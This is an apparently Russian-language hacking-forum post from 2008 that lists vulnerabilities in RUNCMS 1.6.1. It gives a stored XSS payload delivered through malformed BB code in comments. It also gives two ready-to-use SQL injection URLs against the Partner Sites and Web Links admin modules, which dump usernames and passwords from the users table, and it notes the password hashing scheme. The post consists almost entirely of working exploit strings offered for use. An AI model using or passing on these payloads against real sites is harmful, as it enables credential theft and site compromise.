13.03.2008, 19:48
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
RUNCMS 1.6.1
Добавка комментария
-----------------------------
Неправильная обработка BB Code => Active XSS
Пример:
Код:
[*color]</textarea>[XSS][/*color]
Component Partner Sites 1.03 SQL Injection
(Admin priv)
Exploit:
Код:
modules/partners/admin/index.php?op=edit_partner&id=-1/**/union/**/select/**/1,2,3,4,5,concat(uname,0x3a,pass),7/**/from+runcms_users/**/limit/**/0,1
Component Web Links 1.02 SQL Injection
(Admin priv)
Exploit:
Код:
modules/mylinks/admin/index.php?op=modCat&cid=-1/**/union/**/select/**/1,concat(uname,0x3a,pass),3,4/**/from+runcms_users+limit+0,1
Hashing algorithm
PHP код:
$pass = sha1($username.$pass);
© ZAMUT
Последний раз редактировалось ZAMUT; 27.04.2008 в 11:30..
|
|
|